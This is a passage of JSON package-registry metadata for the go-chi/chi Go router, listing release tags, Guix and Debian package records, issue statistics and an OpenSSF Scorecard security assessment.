1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.103Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:guix/go-github-com-go-chi-chi-v5","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/guix/go-github-com-go-chi-chi-v5","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/guix/go-github-com-go-chi-chi-v5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/guix/go-github-com-go-chi-chi-v5/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi-v5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi-v5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi-v5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi-v5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi-v5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-go-chi-chi-v5/codemeta","maintainers":[],"registry":{"name":"guix","url":"https://guix.gnu.org","ecosystem":"guix","default":true,"packages_count":32257,"maintainers_count":0,"namespaces_count":0,"keywords_count":1649,"github":"guix-mirror","metadata":{"funded_packages_count":882},"icon_url":"https://github.com/guix-mirror.png","created_at":"2026-03-02T16:23:46.981Z","updated_at":"2026-08-12T05:05:19.604Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/guix/namespaces"}},{"id":13504318,"name":"golang-github-go-chi-chi","ecosystem":"debian","description":null,"homepage":"https://github.com/go-chi/chi","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/go-chi/chi","keywords_array":["golang"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-10T18:56:07.479Z","latest_release_published_at":"2026-02-10T18:56:07.479Z","latest_release_number":"1.5.1-2","last_synced_at":"2026-03-13T15:38:54.279Z","created_at":"2026-02-10T18:56:07.290Z","updated_at":"2026-08-08T10:51:35.132Z","registry_url":"https://tracker.debian.org/pkg/golang-github-go-chi-chi","install_command":"apt-get install golang-github-go-chi-chi","documentation_url":"https://packages.debian.org/bullseye/golang-github-go-chi-chi","metadata":{"component":"main","architecture":"all","priority":"extra","binary":"golang-github-go-chi-chi-dev","standards_version":"4.5.1","maintainer":"Debian Go Packaging Team \u003cteam+pkg-go@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 12), dh-golang, golang-any","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has 